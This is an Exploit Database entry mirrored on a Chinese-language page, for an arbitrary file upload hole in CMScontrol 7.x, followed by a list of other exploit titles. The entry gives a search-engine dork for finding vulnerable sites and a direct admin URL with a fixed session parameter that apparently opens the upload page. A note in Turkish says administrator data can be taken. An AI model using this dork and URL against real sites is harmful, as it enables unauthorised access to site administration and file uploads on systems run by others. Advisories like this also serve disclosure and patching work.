CMScontrol 7.x – Arbitrary File Upload

Exploit Database
95 阅读

作者： Cyber_945

日期： 2010-01-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11104/

#############################################################
#CMScontrol 7.x File Upload #
#############################################################
# Author: Cyber_945
# Home: Ar-ge.Org
# Greetz: D3xer and All Ar-ge.Org Members
# Not3: Ar-ge.Org Online
# Name: CMScontrol 7.x File Upload
# Bug Type: File Upload
# Infection : Adminin bilgileri alinabilir.
# Dork: inurl:"index.php?id_menu="

#############################################################
=======================C=y=b=e=r=_=9=4=5================
<-- bug code start -- >

Exploit : /admin/katalog.php?id_user=1&sesja=ukEyHkczqqU

Server: http://server/admin/katalog.php?id_user=1&sesja=ukEyHkczqqU

=======================C=y=b=e=r=_=9=4=5================

last Exploits
CMScontrol 7.x – Arbitrary File Upload的更多信息

WordPress Plugin Simple Add Pages or Posts 1.6 – Cross-Site Request Forgery：
Uiga Church Portal – ‘index.php’ SQL Injection：
PHPFox – Access Control Security Bypass：
Joomla! Component Guesser 1.0.4 – ‘type’ SQL Injection：
Nexpose Security Console – Cross-Site Request Forgery：
MPS Box 0.1.8.0 – Arbitrary File Upload：
Koha 3.20.1 – Directory Traversal：
PostNuke FormExpress Module – Blind SQL Injection：